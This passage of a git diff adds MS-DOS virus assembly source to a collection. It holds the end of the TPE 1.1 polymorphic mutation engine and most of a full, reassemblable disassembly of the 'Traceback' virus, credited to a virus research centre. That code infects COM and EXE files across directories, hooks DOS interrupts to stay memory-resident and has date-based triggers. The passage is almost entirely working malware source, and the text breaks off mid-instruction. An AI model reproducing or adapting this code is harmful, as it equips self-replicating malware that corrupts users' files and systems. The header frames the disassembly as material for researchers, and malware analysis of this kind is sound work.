call do_xor + pop bx + +junk6_ret: + pop cx + retn + +junk7: + and al,0fh ;MOV reg,xxxx + or al,0b0h + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + +junk8: + and ah,39h ;DO r/m,r(8,16) + or al,0c0h + call no_sp + xchg ah,al + stosw + retn + +junk9: + and al,3bh ;DO r(8,16),r/m + or al,2 + and ah,3fh + call no_sp2 + call no_bp + stosw + retn + +junkA: + and ah,1 ;DO rm,xxxx + or ax,80c0h + call no_sp + xchg ah,al + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + +junkB: + call nop8 ;NOP/LOOP + mov ax,0fde2h + stosw + retn + +junkC: + and al,9 ;CMPS* or SCAS* + test ah,1 + je mov_test + or al,0a6h + stosb + retn + +mov_test: + or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0a8h + pushf + call rnd_get + popf + jmp short byte_word + +junkD: + and al,7 ;XCHG AX,reg + or al,90h + call no_sp + stosb + retn + +junkE: + and ah,7 + or ah,50h + mov al,ah + or ah,8 + stosw + retn + +junkF: + and al,0fh ;INC/DEC + or al,40h + call no_sp + stosb + retn + +;--- store a byte or a word ------------------------------- + +byte_word: + je only_byte + stosw + retn + +only_byte: + stosb + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp: + push ax + and al,7 + cmp al,4 + pop ax + jne no_sp_ret + and al,0fbh + +no_sp_ret: + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp2: + push ax + and ah,38h + cmp ah,20h + pop ax + jne no_sp2_ret + xor ah,20h + +no_sp2_ret: + retn + +;--- don't use [bp + ..] ---------------------------------- + +no_bp: + test ah,4 + jne no_bp2 + and ah,0fdh + retn + +no_bp2: + push ax + and ah,7 + cmp ah,6 + pop ax + jne no_bp_ret + or ah,1 + +no_bp_ret: + retn + +;--- write byte for JMP/CAL and fill with random bullshit - + +fill_bullshit: + push cx + xchg ax,cx + +bull_lup: + call rnd_get + stosb + loop bull_lup + pop cx + retn + +;--- random number generator ------------------------------ + +rnd_init: + push ax + push cx + call random_init0 + and ax,0h + inc ax + xchg ax,cx + +random_lup: + call rnd_get ;cal random routine a few + loop random_lup ; times to 'warm up' + pop cx + pop ax + retn + +random_init0: + push dx ;initialize generator + push cx + mov ah,2ch + int 21h ;get time CH,CL:DH,DL + in al,40h ;timer + mov ah,al + in al,40h ;timer + xor ax,cx + xor dx,ax + jmp short mov_rnd + +rnd_get: + push dx ;calculate random number + push cx + push bx + in al,40h + +d06502 equ $+01h + add ax,0000h + +d06505 equ $+01h + mov dx,0000h + mov cx,0007h + +rnd_lup: + shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_12 + inc al + +rnd_12: + loop rnd_lup + pop bx + +mov_rnd: + mov word ptr cs:d06502,ax + mov word ptr cs:d06505,dx + mov al,dl + pop cx + pop dx + retn + +;----------------------------------------------------- +;.data + +mov_byte db 0b8,0b0,0b4,00 ;AX,AL,AH,.. + db 0b8,0b3,0b7,00 ;BX,GL,GH,.. + db 0b9,0b1,0b5 ;CX,CL,CH + +nop_data8 db 90,0f8,0f9,0f5 ;NOP,CLC,STC,CMC + db 0fa,0fc,45,4dh ;CLI,CLD,INC BP,DEC BP + +nop_data16 db 08,20,84,88 ;OR,AND,XCHG,MOV + +dir_change db 07,07,04,05 ;BL/BH,BX,SI,DI + +ind_change db 03,03,06,07 ;BL/BH,BX,SI,DI + +how_mode db 30,30,00,28 ;XOR,XOR,ADD,SUB + +alt_code dw 0c800h,0c0f0h ;ADD AL,CL,???? + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +store_mov db 0 +flags db 0 + + db '[TPE 1.1]' + +tpe_bottom equ $ + + end tpe_top + diff --git a/MSDOS/Virus.MSDOS.Unknown.tracebck.asm b/MSDOS/Virus.MSDOS.Unknown.tracebck.asm new file mode 100644 index 00000000..86461293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tracebck.asm @@ -0,0 +1,1303 @@ + page 65,132 + title The 'Traceback' Virus +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The 'Traceback' Virus +; Disassembled by Joe Hirst, June 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +BOOT SEGMENT AT 0 + + ORG 24H +BW0024 DW ? ; Int 9 offset +BW0026 DW ? ; Int 9 segment + + ORG 70H +BW0070 DW ? ; Int 1CH offset +BW0072 DW ? ; Int 1CH segment + + ORG 80H +BD0080 EQU THIS DWORD +BW0080 DW ? ; Int 20H offset +BW0082 DW ? ; Int 20H segment +BW0084 DW ? ; Int 21H offset +BW0086 DW ? ; Int 21H segment + + ORG 90H +BW0090 DW ? ; Int 24H offset +BW0092 DW ? ; Int 24H segment + + ORG 9CH +BD009C EQU THIS DWORD +BW009C DW ? ; Int 27H offset +BW009E DW ? ; Int 27H segment + + ORG 449H +BB0449 DB ? ; Current VDU mode + +BOOT ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:CODE + +DW0000 DW 02EEBH ; \ Stored start of host program +DB0002 DB 090H ; / +DB0003 DB 0FFH +DB0004 DB 0FBH ; Infection countdown +DD0005 EQU THIS DWORD +DW0005 DW 100H +DW0007 DW 0CBBH +DW0009 DW 4DH +DB000B DB 0, 0 +DB000D DB 0EBH, 2EH, 90H, 0FFH, 0FFH, 6CH, 6CH +DB0014 DB 'o - Copyright S & S E', 29 DUP (0) +CURDIR DB 0, 'PLIC', 60 DUP (0) ; Current directory +DTAFLE DB 3, '????????COM ', 2, 0, 0, 0, 'c:\m ' + DB 1AH, 0, 0AFH, 0AH, 95H, 58H, 0, 0 + DB 'COMMAND.COM', 3 DUP (0) +DTADIR DB 1, '???????????', 10H, 5, 7 DUP (0) + DB 20H, 0E9H, 11H, 0B5H, 12H, 0F6H, 48H, 2, 0 + DB 'CAT-TWO.ARC', 0, 0, 0 +DB00DF DB 0 +SEGREG DW 0AEBH +PTHDSK DB 2 ; Pathname drive +CURDSK DB 2 ; Current disk +ATTR_F DW 0020H ; File attributes +TIME_F DW 22B6H ; File time +DATE_F DW 1174H ; File date +I24_OF DW 04EBH ; Old Int 24H offset +I24_SG DW 0A17H ; Old Int 24H segment +CRTERR DB 0 ; Critical error flag +F_HAND DW 0 ; File handle +F_TIME DW 5951H ; File time +F_DATE DW 0F8BH ; File date +F_ATTR DW 0020H ; File attributes +V_SIGN DB 056H, 047H, 031H ; Virus signature + + ; Entry point + +BP0010: JMP SHORT BP0020 + + DW SIGNAT + +BP0020: CALL BP0640 ; Get relocation constant in SI + CALL BP0600 ; Set Int 24H vector + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV PTH_OF[SI],SI ; \ Address of pathname + ADD PTH_OF[SI],OFFSET DB0884 ; / + MOV PTH_SG[SI],CS ; Segment of pathname + MOV CURDSK[SI],AL ; Save current disk + CALL BP0510 ; Get installed virus segment + MOV DL,PTHDSK[DI] ; Get pathname drive in installed virus + MOV AX,DS ; Get segment in installed virus + PUSH CS ; \ Set DS to CS + POP DS ; / + JNZ BP0030 ; Branch if not installed + MOV PTH_OF[SI],OFFSET DB0884+100H ; Pathname in installed virus + MOV PTH_SG[SI],AX ; Segment in installed virus + CMP DL,0FFH ; Is there a pathname drive? + JE BP0030 ; Branch if not + MOV AH,0EH ; Select disk function + INT 21H ; DOS service +BP0030: MOV BYTE PTR SWTCHB[SI],80H ; Set on switch eight + MOV F_HAND[SI],0 ; Clear file handle + MOV AH,2AH ; Get date function + INT 21H ; DOS service + CMP CX,07C4H ; Is year 1988? + JGE BP0040 ; Branch if not before + JMP SHORT BP0070 + +PTH_OF DW 0F8CH ; Offset of pathname +PTH_SG DW 0AEBH ; Segment of pathname +ISWTCH DB 0 ; Infected file switch + + ; 1988 or later + +BP0040: JG BP0050 ; Branch if after 1988 + CMP DH,0CH ; Is month December? + JL BP0070 ; Branch if not + CMP DL,5 ; 5th of December? + JL BP0070 ; Branch if before + CMP DL,1CH ; 28th of December? + JL BP0060 ; Branch if before +BP0050: MOV DSPCNT[SI],0FFDCH ; Start display count (60 mins) + MOV BYTE PTR SWTCHB[SI],88H ; Switches four & eight +BP0060: CMP DB0004[SI],0F8H ; Has infection count reached target? + JNB BP0080 ; Branch if not + ASSUME DS:NOTHING +BP0070: MOV CRTERR[SI],0 ; Clear critical error flag + JMP BP0270 + + ; Unreachable code + + ASSUME DS:CODE + CMP DB0004[SI],0F8H ; Has infection count reached target? + JNB BP0080 ; Branch if not + OR BYTE PTR SWTCHB[SI],4 ; Set on switch three + +BP0080: MOV DB00DF[SI],0 ; Set not-first-time switch off + MOV DX,PTH_OF[SI] ; Get pathname offset + MOV DS,PTH_SG[SI] ; Get pathname segment + MOV AX,4300H ; Get attributes function + CALL BP0230 ; Perform a DOS service + JB BP0090 ; Branch if error + ASSUME DS:NOTHING + MOV F_ATTR[SI],CX ; Save file attributes + AND CL,0FEH ; Switch off read-only + MOV AX,4301H ; Set attributes function + CALL BP0230 ; Perform a DOS service + JB BP0090 ; Branch if error + MOV AX,3D02H ; Open handle R/W function + INT 21H ; DOS service + JB BP0090 ; Branch if error + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV F_HAND[SI],AX ; Save file handle + MOV BX,AX ; Move file handle + MOV AX,5700H ; Get file date and time function + INT 21H ; DOS service + MOV F_TIME[SI],CX ; Save file time + MOV F_DATE[SI],DX ; Save file date + DEC DB0004[SI] ; Decrement infection count + MOV DX,FLENLO[SI] ; Get file length, low word + MOV CX,FLENHI[SI] ; Get file length, high word + ADD DX,OFFSET DB0004 ; \ Add to length + ADC CX,0 ; / + MOV AX,4200H ; Move file pointer (start) function + INT 21H ; DOS service +BP0090: PUSH CS ; \ Set DS to CS + POP DS ; / + TEST BYTE PTR SWTCHB[SI],4 ; Test switch three + JZ BP0100 ; Branch if off + CALL BP0330 ; Write infection count + JMP BP0270 + + ; Change directory to root + +BP0100: XOR DL,DL ; Default drive + MOV AH,47H ; Get current directory function + PUSH SI + ADD SI,46H ; Address directory store + INT 21H ; DOS service + POP SI + CMP CRTERR[SI],0 ; Test critical error flag + JNE BP0110 ; Branch if set + CALL BP0250 ; Make root dir current dir + JNB BP0120 ; Branch if no error +BP0110: JMP BP0070 + + ; Find COM files + +BP0120: MOV DX,SI ; \ Address DTA area + ADD DX,OFFSET DTAFLE ; / + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service + MOV [SI+5],'.*' ; \ + MOV [SI+7],'OC' ; ) '*.COM' + MOV WORD PTR [SI+9],'M' ; / + MOV AH,4EH ; Find first file function + MOV DX,SI ; \ Address file spec + ADD DX,5 ; / +BP0130: MOV CX,0020H ; Attributes - archive + CALL BP0230 ; Perform a DOS service + JB BP0160 ; Move on to EXE files + MOV DX,SI ; \ Address filename in DTA + ADD DX,OFFSET DTAFLE+1EH ; / + MOV ISWTCH[SI],0 ; Set infected file switch off + CALL BP0350 ; Process file + JB BP0150 ; Error or infected file found + CALL BP0330 ; Write infection count +BP0140: JMP BP0260 + +BP0150: CMP CRTERR[SI],0 ; Test critical error flag + JNE BP0140 ; Branch if set + CMP ISWTCH[SI],0 ; Test infected file switch + JNE BP0200 ; Branch if on + MOV AH,4FH ; Find next file function + JMP BP0130 + + ; Find EXE files + +BP0160: MOV [SI+7],'XE' ; \ '*.EXE' + MOV WORD PTR [SI+9],'E' ; / + MOV AH,4EH ; Find first file function + MOV DX,SI ; \ Address file spec + ADD DX,5 ; / +BP0170: MOV CX,0020H ; Attributes - archive + CALL BP0230 ; Perform a DOS service + JB BP0200 ; No more files + MOV DX,SI ; \ Address filename in DTA + ADD DX,OFFSET DTAFLE+1EH ; / + MOV ISWTCH[SI],0 ; Set infected file switch off + CALL BP0350 ; Process file + JB BP0190 ; Error or infected file found + CALL BP0330 ; Write infection count +BP0180: JMP BP0260 + + ASSUME DS:NOTHING +BP0190: CMP CRTERR[SI],0 ; Test critical error flag + JNE BP0180 ; Branch if set + ASSUME DS:CODE + CMP ISWTCH[SI],0 ; Test infected file switch + JNE BP0200 ; Branch if on + MOV AH,4FH ; Find next file function + JMP BP0170 + +BP0200: CALL BP0250 ; Make root dir current dir + MOV DX,SI ; \ Address 2nd DTA + ADD DX,OFFSET DTADIR ; / + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service +BP0210: MOV AH,4FH ; Find next file function + MOV CX,0010H ; Find directories + CMP DB00DF[SI],0 ; First time? + JNE BP0220 ; Branch if not + MOV DB00DF[SI],1 ; Set not-first-time switch + MOV [SI+5],'.*' ; \ '*.*' + MOV WORD PTR [SI+7],'*' ; / + MOV AH,4EH ; Find first file function + MOV DX,SI ; \ Address file spec + ADD DX,5 ; / +BP0220: CALL BP0230 ; Perform a DOS service + JB BP0260 ; No more files + TEST DTADIR[SI+15H],10H ; Is it a directory? + JZ BP0210 ; Branch if not + MOV DX,SI ; \ Address file name in DTA + ADD DX,OFFSET DTADIR+1EH ; / + MOV AH,3BH ; Change current directory function + CALL BP0230 ; Perform a DOS service + JB BP0260 ; Branch if error + JMP BP0120 ; Look for COM files + + ; Perform a DOS service + +BP0230: INT 21H ; DOS service + JB BP0240 ; Branch if error + ASSUME DS:NOTHING + TEST CRTERR[SI],0FFH ; Test critical error flag + JZ BP0240 ; Branch if not set + STC +BP0240: RET + + ; Make root dir current dir + +BP0250: MOV WORD PTR [SI+5],'\' ; Root dir + MOV DX,SI ; \ Address root dir pathname + ADD DX,5 ; / + MOV AH,3BH ; Change current directory function + CALL BP0230 ; Perform a DOS service + RET + + ASSUME DS:CODE +BP0260: CALL BP0250 ; Make root dir current dir + MOV DX,SI ; \ Address + ADD DX,46H ; / + MOV AH,3BH ; Change current directory function + INT 21H ; DOS service +BP0270: MOV BX,F_HAND[SI] ; Get file handle + OR BX,BX ; Test for a handle + JZ BP0290 ; Branch if none + MOV CX,F_ATTR[SI] ; Get file attributes + MOV DX,PTH_OF[SI] ; Get pathname offset + MOV DS,PTH_SG[SI] ; Get pathname segment + CMP CX,20H ; Are attributes archive? + JE BP0280 ; Branch if yes + MOV AX,4301H ; Set attributes function + INT 21H ; DOS service +BP0280: PUSH CS ; \ Set DS to CS + POP DS ; / + MOV CX,F_TIME[SI] ; Get file time + MOV DX,F_DATE[SI] ; Get file date + MOV AX,5701H ; Set file date and time function + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service +BP0290: MOV DL,CURDSK[SI] ; Get current disk + MOV AH,0EH ; Select disk function + INT 21H ; DOS service + CALL BP0610 ; Restore Int 24H vector + POP AX ; ? + MOV SEGREG[SI],AX ; Save segment + CMP BYTE PTR [SI+3],0FFH ; Should virus be installed? + JE BP0300 ; Branch if yes + ADD AX,0010H ; Add PSP length to segment + ADD WORD PTR [SI+2],AX ; Store segment + POP AX ; ? + POP DS ; ? + JMP DWORD PTR CS:[SI] ; Branch to ? + + ; Install resident copy of virus + +BP0300: CALL BP0510 ; Get installed virus segment + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV AX,[SI] ; \ Replace first word of host + MOV DW0000+100H,AX ; / + MOV AL,[SI+2] ; \ Replace third byte of host + MOV DB0002+100H,AL ; / + JZ BP0310 ; Branch if installed + MOV BX,DS ; Get current segment + ADD BX,01D0H ; Add length of installed segment + MOV ES,BX ; Segment to copy to + MOV DI,SI ; Start of virus + MOV DX,SI ; Copy relocation factor + MOV CX,OFFSET ENDADR ; Length of virus + CALL BP1160 ; Copy virus and transfer control + MOV CX,DX ; Relocation factor (as length) + MOV SI,DX ; Relocation factor as source + DEC SI ; Back one byte + MOV DI,SI ; Same offset as target + STD ; Going backwards + REPZ MOVSB ; Copy host program + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV DI,0100H ; Target following PSP + MOV DS,BX ; Current segment as source + MOV SI,DX ; Start of virus + MOV CX,OFFSET ENDADR ; Length of virus + CALL BP1160 ; Copy virus and transfer control + MOV SI,0100H ; New relocation factor + PUSH CS ; \ Set DS to CS + POP DS ; / + CALL BP0580 ; Install interrupts + MOV DX,01D0H ; Get length of installed segment +BP0310: MOV DI,CS ; \ New segment for host + ADD DI,DX ; / + MOV WORD PTR [SI+5],0100H ; Host offset + MOV [SI+7],DI ; Host segment + POP AX ; ? + POP DS ; ? + MOV DS,DI ; \ + MOV ES,DI ; ) Set up other segment registers + MOV SS,DI ; / + XOR BX,BX ; Clear register + XOR CX,CX ; Clear register + XOR BP,BP ; Clear register + JMP DWORD PTR CS:[SI+5] ; Branch to host program + + ; Clear error flag and return + + ASSUME DS:NOTHING +BP0320: MOV CRTERR[SI],0 ; Clear critical error flag + RET + + ; Write infection count + + ASSUME DS:CODE +BP0330: MOV BX,F_HAND[SI] ; Get file handle + OR BX,BX ; Test for a handle + JZ BP0340 ; Branch if none + MOV DX,SI ; \ Address infection count + ADD DX,OFFSET DB0004 ; / + MOV CX,1 ; Length to write + MOV AH,40H ; Write handle function + INT 21H ; DOS service +BP0340: RET + + ; Process file + +BP0350: PUSH DX + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + ADD AL,'A' ; Convert to letter + MOV AH,':' ; Disk separator + MOV WORD PTR DB0884[SI],AX ; Disk in pathname + MOV BYTE PTR DB0884[SI+2],'\' ; Root directory in pathname + PUSH SI + ADD SI,OFFSET DB0884+3 ; Address next position in pathname + MOV AH,47H ; Get current directory function + MOV DI,SI ; Buffer area + XOR DL,DL ; Default drive + INT 21H ; DOS service + POP SI + DEC DI ; Back one character +BP0360: INC DI ; Next character + MOV AL,[DI] ; Get character + OR AL,AL ; Is it zero + JNZ BP0360 ; Branch if not + POP BX + MOV BYTE PTR [DI],'\' ; Store directory separator + INC DI ; Next position + MOV DX,BX ; Copy filename pointer +BP0370: MOV AL,[BX] ; Get character + MOV [DI],AL ; Store in pathname + INC BX ; Next input position + INC DI ; Next output position + OR AL,AL ; End of filename? + JNZ BP0370 ; Next character if not +BP0380: MOV AX,4300H ; Get attributes function + CALL BP0230 ; Perform a DOS service + JB BP0320 ; Branch if error + ASSUME DS:NOTHING + MOV ATTR_F[SI],CX ; Save attributes + AND CX,00FEH ; Set off read only + MOV AX,4301H ; Set attributes function + CALL BP0230 ; Perform a DOS service + JB BP0320 ; Branch if error + MOV AX,3D02H ; Open handle R/W function + CALL BP0230 ; Perform a DOS service + JB BP0320 ; Branch if error + MOV BX,AX ; Move handle + PUSH DS + PUSH DX + CALL BP0400 ; Infect file if not infected + POP DX + POP DS + PUSHF + MOV CX,ATTR_F[SI] ; Get attributes + CMP CX,20H ; Archive only? + JE BP0390 ; Branch if yes + MOV AX,4301H ; Set attributes function + INT 21H ; DOS service +BP0390: MOV CX,TIME_F[SI] ; Get file time + MOV DX,DATE_F[SI] ; Get file date + MOV AX,5701H ; Set file date and time function + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + POPF + RET + + ; Infect file if not infected + +BP0400: MOV AX,5700H ; Get file date and time function + INT 21H ; DOS service + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV TIME_F[SI],CX ; Save file time + MOV DATE_F[SI],DX ; Save file date + MOV DX,SI ; \ Address buffer + ADD DX,0DH ; / + MOV DI,DX ; Copy this address + MOV AH,3FH ; Read handle function + MOV CX,001CH ; EXE header length + INT 21H ; DOS service + CMP WORD PTR [DI],'ZM' ; EXE header? + JE BP0430 ; Branch if yes + CALL BP0500 ; Move pointer to end of file + ADD AX,OFFSET SIGNAT+100H ; Add length of virus + JB BP0410 ; Branch if too big for a COM + CMP BYTE PTR [DI],0E9H ; Does it start with a near jump? + JNE BP0420 ; Branch if not + MOV DX,[DI+1] ; Get displacement from jump + XOR CX,CX ; Clear top + MOV AX,4200H ; Move file pointer (start) function + INT 21H ; DOS service + MOV DX,DI ; Read buffer + ADD DX,001CH ; Add length of EXE header + MOV AH,3FH ; Read handle function + MOV CX,3 ; Length to read + INT 21H ; DOS service + CALL BP0440 ; Test virus signature on file + JNB BP0420 ; Branch if not present + ASSUME DS:NOTHING + MOV ISWTCH[SI],1 ; Set infected file switch on +BP0410: RET + + ASSUME DS:CODE +BP0420: CALL BP0500 ; Move pointer to end of file + MOV FLENLO[SI],AX ; Save file length, low word + MOV FLENHI[SI],DX ; Save file length, high word + PUSH AX + MOV WORD PTR [DI+3],0FFFFH ; Initialise count + MOV CX,5 ; Length to write + MOV AH,40H ; Write handle function + MOV DX,DI ; Address start of buffer + INT 21H ; DOS service + MOV DX,SI ; \ Address start of virus + ADD DX,5 ; / + MOV CX,OFFSET SIGNAT ; Length of virus + MOV AH,40H ; Write handle function + INT 21H ; DOS service + MOV AX,4200H ; Move file pointer (start) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + MOV BYTE PTR [DI],0E9H ; Near jump instruction + POP AX ; Recover length of file + ADD AX,OFFSET BP0010-3 ; Jump offset to entry point + MOV [DI+1],AX ; Store in jump instruction + MOV DX,DI ; Address of jump instruction + MOV CX,3 ; Length to write + MOV AH,40H ; Write handle function + INT 21H ; DOS service + CLC + RET + + ; EXE file + +BP0430: CMP WORD PTR [DI+0CH],0FFFFH ; Is max alloc asking for maximum? + JNE BP0450 ; Branch if not + PUSH SI + MOV SI,[DI+14H] ; Get initial offset + MOV CX,[DI+16H] ; Get initial segment + MOV AX,CX ; Copy segment + MOV CL,CH ; Move top byte down + XOR CH,CH ; Clear top + SHR CX,1 ; \ + SHR CX,1 ; \ Move top nibble into position + SHR CX,1 ; / + SHR CX,1 ; / + SHL AX,1 ; \ + SHL AX,1 ; \ Move rest of segment + SHL AX,1 ; / + SHL AX,1 ; / + ADD SI,AX ; \ Add to offset + ADC CX,0 ; / + SUB SI,3 ; \ Subtract length of signature + SBB CX,0 ; / + MOV AX,[DI+8] ; Get size of header + CALL BP0490 ; Move segment to two-register offset + ADD SI,AX ; \ Add to starting position + ADC CX,DX ; / + MOV DX,SI ; Move low word + POP SI + MOV AX,4200H ; Move file pointer (start) function + INT 21H ; DOS service + MOV DX,DI ; Address buffer + ADD DX,001CH ; Add length of EXE header + MOV AH,3FH ; Read handle function + MOV CX,3 ; Length to read + INT 21H ; DOS service + CALL BP0440 ; Test virus signature on file + JNB BP0480 ; Branch if not present + ASSUME DS:NOTHING + MOV ISWTCH[SI],1 ; Set infected file switch on + RET + + ; Test virus signature on file + +BP0440: CMP WORD PTR [DI+1CH],4756H ; Look for virus signature + JNE BP0470 ; Branch if not found + CMP BYTE PTR [DI+1EH],31H ; Look for rest of signature + JNE BP0470 ; Branch if not found +BP0450: STC +BP0460: RET + +BP0470: CLC + RET + + ; Infect EXE file + + ASSUME DS:CODE +BP0480: CALL BP0500 ; Move pointer to end of file + MOV FLENLO[SI],AX ; Save file length, low word + MOV FLENHI[SI],DX ; Save file length, high word + MOV CX,[DI+4] ; Get size of file in pages + SHL CX,1 ; Multiply by two + XCHG CH,CL ; Reverse bytes + MOV BP,CX ; Copy + AND BP,0FF00H ; Convert to bytes (low word) + XOR CH,CH ; Convert to bytes (high word) + ADD BP,[DI+6] ; \ Add number of relocation entries + ADC CX,0 ; / + SUB BP,AX ; \ Subtract current length + SBB CX,DX ; / + JB BP0460 ; Branch if overlay + PUSH AX ; Save length of host, low word + PUSH DX ; Save length of host, high word + PUSH [DI+18H] ; Save offset to relocation table + MOV BYTE PTR [DI+18H],0FFH ; Original entry address marker + MOV CX,5 ; Length to write + MOV AH,40H ; Write handle function + MOV DX,DI ; \ Address host entry address + ADD DX,14H ; / + INT 21H ; DOS service + POP [DI+18H] ; Recover offset to relocation table + MOV DX,SI ; \ Address start of virus + ADD DX,5 ; / + MOV CX,OFFSET SIGNAT ; Length of virus + MOV AH,40H ; Write handle function + INT 21H ; DOS service + MOV AX,4200H ; Move file pointer (start) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + POP [DI+16H] ; Recover length of host, high word + POP [DI+14H] ; Recover length of host, low word + ADD WORD PTR [DI+14H],00FAH ; \ Add entry point + ADC WORD PTR [DI+16H],0 ; / + MOV AX,[DI+8] ; Get size of header + CALL BP0490 ; Move segment to two-register offset + SUB [DI+14H],AX ; \ Subtract size of header + SBB [DI+16H],DX ; / + MOV CL,0CH ; Bits to move + SHL WORD PTR [DI+16H],CL ; Convert high word to segment + MOV AX,OFFSET ENDADR ; Length of virus + ADD AX,[DI+2] ; Add bytes in last paragraph + MOV [DI+2],AX ; Store new figure + AND [DI+2],01FFH ; Set off top bits + MOV AL,AH ; Copy high byte + XOR AH,AH ; Clear top of register + SHR AX,1 ; Divide by two + ADD [DI+4],AX ; Add to pages + MOV DX,DI ; Move address of EXE header + MOV CX,001CH ; EXE header length + MOV AH,40H ; Write handle function + INT 21H ; DOS service + CLC + RET + + ; Move segment to two-register offset + +BP0490: XOR DX,DX ; Clear register + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + RET + + ; Move pointer to end of file + +BP0500: XOR DX,DX ; \ No displacement + XOR CX,CX ; / + MOV AX,4202H ; Move file pointer (EOF) function + INT 21H ; DOS service + RET + + ; Get installed virus segment + +BP0510: XOR AX,AX ; \ Address zero + MOV DS,AX ; / + LDS DI,BD009C ; Load Int 27H vector + LDS DI,[DI+1] ; Get vector from far jump + MOV AX,DI ; Save offset + SUB DI,OFFSET BP0780-V_SIGN ; Address from jump to old Int 27H + CALL BP0530 ; Test virus signature in memory + JZ BP0520 ; Branch if found + MOV DI,AX ; Retrieve offset + SUB DI,OFFSET BP0770-V_SIGN ; Address from new Int 27H routine + CALL BP0530 ; Test virus signature in memory + JZ BP0520 ; Branch if found + LDS DI,BD0080 ; Load Int 20H vector + LDS DI,[DI+1] ; Get vector from far jump + MOV AX,DI ; Save offset + SUB DI,OFFSET BP0630-V_SIGN ; Address from jump to old Int 20H + CALL BP0530 ; Test virus signature in memory + JZ BP0520 ; Branch if found + MOV DI,AX ; Retrieve offset + SUB DI,OFFSET BP0620-V_SIGN ; Address from new Int 27H routine + CALL BP0530 ; Test virus signature in memory +BP0520: RET + + ; Test virus signature in memory + +BP0530: XOR DX,DX ; Clear register + CMP WORD PTR [DI],4756H ; Look for virus signature + JNE BP0540 ; Branch if not present + CMP BYTE PTR [DI+2],31H ; Look for rest of signature + JE BP0550 ; Branch if there +BP0540: INC DX ; Set no virus marker +BP0550: SUB DI,OFFSET V_SIGN ; Subtract offset of signature + OR DX,DX ; Test no virus marker + RET + + ; Create far jump + +BP0560: MOV AL,0EAH ; Far jump + STOSB ; Store jump instruction + MOV AX,CX ; \ Address routine + ADD AX,SI ; / + STOSW ; Store offset + MOV AX,CS ; Get segment + STOSW ; Store segment +BP0570: RET + + ; Install interrupts + +BP0580: OR DX,DX + JZ BP0570 ; Dont install if yes + PUSH DS + PUSH ES + MOV ES,SEGREG[SI] ; Get segment register + MOV DI,00ECH ; Address far jump table + CLD + MOV CX,OFFSET BP0880 ; Int 1CH routine + CALL BP0560 ; Create Int 1CH far jump + MOV CX,OFFSET BP0620 ; Int 20H routine + CALL BP0560 ; Create Int 20H far jump + MOV CX,OFFSET BP0700 ; Int 21H routine + CALL BP0560 ; Create Int 21H far jump + MOV CX,OFFSET BP0770 ; Int 27H routine + CALL BP0560 ; Create Int 27H far jump + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + ASSUME DS:BOOT + CLI + MOV AX,00ECH ; Address Int 1CH far jump + XCHG AX,BW0070 ; Install as Int 1CH offset + MOV CS:I1C_OF[SI],AX ; Save old Int 1CH offset + MOV AX,ES ; Get this segment + XCHG AX,BW0072 ; Install as Int 1CH segment + MOV CS:I1C_SG[SI],AX ; Save old Int 1CH segment + MOV AX,00F1H ; Address Int 20H far jump + XCHG AX,BW0080 ; Install as Int 20H offset + MOV CS:I20_OF[SI],AX ; Save old Int 20H offset + MOV AX,ES ; Get this segment + XCHG AX,BW0082 ; Install as Int 20H segment + MOV CS:I20_SG[SI],AX ; Save old Int 20H segment + MOV AX,00F6H ; Address Int 21H far jump + XCHG AX,BW0084 ; Install as Int 21H offset + MOV CS:I21_OF[SI],AX ; Save old Int 21H offset + MOV AX,ES ; Get this segment + XCHG AX,BW0086 ; Install as Int 21H segment + MOV CS:I21_SG[SI],AX ; Save old Int 21H segment + MOV AX,00FBH ; Address Int 27H far jump + XCHG AX,BW009C ; Install as Int 27H offset + MOV CS:I27_OF[SI],AX ; Save old Int 27H offset + MOV AX,ES ; Get this segment + XCHG AX,BW009E ; Install as Int 27H segment + MOV CS:I27_SG[SI],AX ; Save old Int 27H segment + POP ES + POP DS + STI + RET + + ; Reset interrupts + + ASSUME DS:CODE +BP0590: PUSH ES + MOV ES,SEGREG[SI] ; Get segment register + MOV DI,00F1H ; Address far jump table (2nd entry) + CLD + MOV CX,OFFSET BP0630 ; Jump to old Int 20H + CALL BP0560 ; Create Int 20H far jump + MOV CX,OFFSET BP0720 ; Alternate Int 21H routine + CALL BP0560 ; Create Int 21H far jump + MOV CX,OFFSET BP0780 ; Jump to old Int 27H + CALL BP0560 ; Create Int 27H far jump + POP ES + RET + + ; Set Int 24H vector + +BP0600: PUSH ES + XOR AX,AX ; \ Address zero + MOV ES,AX ; / + ASSUME ES:BOOT + MOV AX,OFFSET BP0790 ; \ Interrupt 24H routine + ADD AX,SI ; / + XCHG AX,BW0090 ; Install as Int 